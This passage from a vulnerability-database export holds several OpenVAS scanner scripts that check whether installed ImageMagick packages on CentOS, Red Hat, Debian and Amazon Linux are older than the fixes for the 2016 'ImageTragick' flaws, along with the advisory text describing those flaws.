script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:32 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ImageMagick CESA-2016:0726 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of ImageMagick\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple image\nformats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. (CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0726\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021865.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:06", "description": "Check the version of ImageMagick", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "CentOS Update for ImageMagick CESA-2016:0726 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882484", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882484", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ImageMagick CESA-2016:0726 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882484\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:37 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ImageMagick CESA-2016:0726 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ImageMagick\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple\nimage formats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. (CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0726\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021866.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "RedHat Update for ImageMagick RHSA-2016:0726-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871609", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871609", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ImageMagick RHSA-2016:0726-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871609\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:03 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for ImageMagick RHSA-2016:0726-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple\nimage formats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. (CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0726-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-May/msg00010.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:51", "description": "Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717 \n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.", "cvss3": {}, "published": "2016-05-16T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3580-1 (imagemagick - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703580", "href": "http://plugins.openvas.org/nasl.php?oid=703580", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3580.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3580-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703580);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_name(\"Debian Security Advisory DSA 3580-1 (imagemagick - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-05-16 00:00:00 +0200 (Mon, 16 May 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3580.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"imagemagick on Debian Linux\");\n script_tag(name: \"insight\", value: \"ImageMagick is a software suite\nto create, edit, and compose bitmap images. It can read, convert and write\nimages in a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000,\nPDF, PhotoCD, PNG, Postscript, SVG, and TIFF. Use ImageMagick to translate, flip,\nmirror, rotate, scale, shear and transform images, adjust image colors, apply various\nspecial effects, or draw text, lines, polygons, ellipses and Bzier curves.\nAll manipulations can be achieved through shell commands as well as through\nan X11 graphical interface (display).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these\nproblems have been fixed in version 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name: \"summary\", value: \"Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717 \n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libimage-magick-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libimage-magick-q16-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-17T22:57:02", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-699)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120688", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See 